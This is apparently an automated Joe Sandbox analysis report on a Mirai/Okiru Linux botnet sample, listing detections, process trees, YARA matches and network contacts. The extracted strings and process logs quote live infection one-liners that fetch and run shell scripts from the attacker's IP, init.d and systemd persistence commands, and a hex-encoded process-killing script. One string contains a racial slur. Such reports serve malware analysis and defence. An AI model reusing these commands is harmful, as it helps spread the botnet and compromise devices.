Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
x86_64.nn.elf

Overview

General Information

Sample name:x86_64.nn.elf
Analysis ID:1568904
MD5:e67f9408d19e274031b09ddb0df19889
SHA1:9ed2655ddc054b09bfad0887b8a846686fc41222
SHA256:d9e0bb9caa406ba0b6355cc9187426989952afe832ca54dc5e735d4abd760bb0
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Drops files in suspicious directories
Machine Learning detection for sample
Sample deletes itself
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Writes shell script file to disk with an unusual file extension
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1568904
Start date and time:2024-12-05 07:27:04 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 45s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:x86_64.nn.elf
Detection:MAL
Classification:mal100.spre.troj.evad.linELF@0/9@0/0
Command:/tmp/x86_64.nn.elf
PID:6230
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • x86_64.nn.elf (PID: 6230, Parent: 6150, MD5: e67f9408d19e274031b09ddb0df19889) Arguments: /tmp/x86_64.nn.elf
    • sh (PID: 6254, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 6272, Parent: 6254)
      • systemctl (PID: 6272, Parent: 6254, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 6303, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      • sh New Fork (PID: 6305, Parent: 6303)
      • chmod (PID: 6305, Parent: 6303, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system
    • sh (PID: 6306, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
      • sh New Fork (PID: 6309, Parent: 6306)
      • ln (PID: 6309, Parent: 6306, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system
    • sh (PID: 6310, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
    • sh (PID: 6311, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
      • sh New Fork (PID: 6313, Parent: 6311)
      • chmod (PID: 6313, Parent: 6311, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/sh
    • sh (PID: 6315, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 6328, Parent: 6315)
      • mkdir (PID: 6328, Parent: 6315, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 6331, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
      • sh New Fork (PID: 6332, Parent: 6331)
      • ln (PID: 6332, Parent: 6331, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/sh /etc/rc.d/S99sh
  • udisksd New Fork (PID: 6242, Parent: 799)
  • dumpe2fs (PID: 6242, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6274, Parent: 799)
  • dumpe2fs (PID: 6274, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 6283, Parent: 6280)
  • snapd-env-generator (PID: 6283, Parent: 6280, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • sh (PID: 6289, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
  • gsd-housekeeping (PID: 6289, Parent: 1477, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping
  • dash New Fork (PID: 6312, Parent: 4331)
  • rm (PID: 6312, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.jSHAVmWWrE /tmp/tmp.CXFzKUkFGh /tmp/tmp.rl4jlLXWcp
  • dash New Fork (PID: 6314, Parent: 4331)
  • rm (PID: 6314, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.jSHAVmWWrE /tmp/tmp.CXFzKUkFGh /tmp/tmp.rl4jlLXWcp
  • gdm3 New Fork (PID: 6329, Parent: 1320)
  • Default (PID: 6329, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6330, Parent: 1320)
  • Default (PID: 6330, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • udisksd New Fork (PID: 6346, Parent: 799)
  • dumpe2fs (PID: 6346, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6442, Parent: 799)
  • dumpe2fs (PID: 6442, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6445, Parent: 799)
  • dumpe2fs (PID: 6445, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
x86_64.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    x86_64.nn.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      x86_64.nn.elfLinux_Trojan_Gafgyt_9e9530a7unknownunknown
      • 0x106a4:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
      x86_64.nn.elfLinux_Trojan_Gafgyt_807911a2unknownunknown
      • 0x10e93:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
      x86_64.nn.elfLinux_Trojan_Gafgyt_d4227dbfunknownunknown
      • 0xce9e:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      • 0xd15c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
      Click to see the 4 entries
      SourceRuleDescriptionAuthorStrings
      6230.1.0000000000400000.0000000000418000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
        6230.1.0000000000400000.0000000000418000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6230.1.0000000000400000.0000000000418000.r-x.sdmpLinux_Trojan_Gafgyt_9e9530a7unknownunknown
          • 0x106a4:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
          6230.1.0000000000400000.0000000000418000.r-x.sdmpLinux_Trojan_Gafgyt_807911a2unknownunknown
          • 0x10e93:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
          6230.1.0000000000400000.0000000000418000.r-x.sdmpLinux_Trojan_Gafgyt_d4227dbfunknownunknown
          • 0xce9e:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
          • 0xd15c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
          Click to see the 45 entries
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: x86_64.nn.elfAvira: detected
          Source: x86_64.nn.elfReversingLabs: Detection: 42%
          Source: x86_64.nn.elfJoe Sandbox ML: detected
          Source: x86_64.nn.elfString: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe..%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh487154914<146<2surf2/proc/%d/exe/ /.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginFound And Killed Process: PID=%d, Realpath=%s/snap/snapd/15534/usr/lib/snapd/snapd/usr/libexec/openssh/sftp-serveranko-app/ankosample _8182T_110494.156.227.234mallocwaitpid/etc/motd%s
          Source: x86_64.nn.elfString: .dThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"
          Source: global trafficTCP traffic: 192.168.2.23:38964 -> 154.216.19.139:199
          Source: global trafficTCP traffic: 192.168.2.23:60026 -> 94.156.227.234:38242
          Source: /tmp/x86_64.nn.elf (PID: 6230)Socket: 0.0.0.0:38242Jump to behavior
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 154.216.19.139
          Source: unknownTCP traffic detected without corresponding DNS query: 213.181.192.16
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
          Source: unknownTCP traffic detected without corresponding DNS query: 13.114.223.24
          Source: unknownTCP traffic detected without corresponding DNS query: 186.161.57.239
          Source: unknownTCP traffic detected without corresponding DNS query: 132.163.61.148
          Source: unknownTCP traffic detected without corresponding DNS query: 181.221.140.128
          Source: unknownTCP traffic detected without corresponding DNS query: 84.16.187.43
          Source: unknownTCP traffic detected without corresponding DNS query: 9.74.43.104
          Source: unknownTCP traffic detected without corresponding DNS query: 169.68.103.115
          Source: unknownTCP traffic detected without corresponding DNS query: 141.55.192.117
          Source: unknownTCP traffic detected without corresponding DNS query: 180.138.114.124
          Source: unknownTCP traffic detected without corresponding DNS query: 213.181.192.16
          Source: unknownTCP traffic detected without corresponding DNS query: 174.59.252.56
          Source: unknownTCP traffic detected without corresponding DNS query: 166.173.139.121
          Source: unknownTCP traffic detected without corresponding DNS query: 63.4.197.151
          Source: unknownTCP traffic detected without corresponding DNS query: 27.159.156.110
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
          Source: x86_64.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, sh.38.dr, bootcmd.12.dr, custom.service.12.drString found in binary or memory: http://94.156.227.233/
          Source: x86_64.nn.elfString found in binary or memory: http://94.156.227.233/curl.sh
          Source: x86_64.nn.elfString found in binary or memory: http://94.156.227.233/lol.sh
          Source: x86_64.nn.elfString found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
          Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

          System Summary

          barindex
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: x86_64.nn.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 6230.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 6230.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 6230.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 6230.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 6230.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 6230.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 6230.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 6338.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 6338.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 6338.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 6338.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 6338.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 6338.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 6338.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 6335.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 6335.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 6335.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 6335.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 6335.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 6335.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 6335.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 6333.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 6333.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 6333.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 6333.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 6333.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 6333.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 6333.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: 6245.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 Author: unknown
          Source: 6245.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 Author: unknown
          Source: 6245.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf Author: unknown
          Source: 6245.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 Author: unknown
          Source: 6245.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
          Source: 6245.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
          Source: 6245.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
          Source: Initial sampleString containing 'busybox' found: /bin/busybox
          Source: Initial sampleString containing 'busybox' found: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe..%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh487154914<146<2surf2/proc/%d/exe/ /.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpyth
          Source: Initial sampleString containing 'busybox' found: usage: busybox
          Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
          Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
          Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
          Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;
          Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;
          Source: Initial sampleString containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;
          Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
          Source: Initial sampleString containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k94.156.227.233GET /dlr. HTTP/1.0
          Source: Initial sampleString containing 'busybox' found: .dThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: /tmp/x86_64.nn.elf (PID: 6245)SIGKILL sent: pid: 788, result: successfulJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6245)SIGKILL sent: pid: 884, result: successfulJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6245)SIGKILL sent: pid: 1664, result: successfulJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6245)SIGKILL sent: pid: 2096, result: successfulJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6245)SIGKILL sent: pid: 2102, result: successfulJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6245)SIGKILL sent: pid: 4437, result: successfulJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6245)SIGKILL sent: pid: 6289, result: successfulJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6245)SIGKILL sent: pid: 6293, result: successfulJump to behavior
          Source: /tmp/x86_64.nn.elf (PID: 6338)SIGKILL sent: pid: 6333, result: successfulJump to behavior
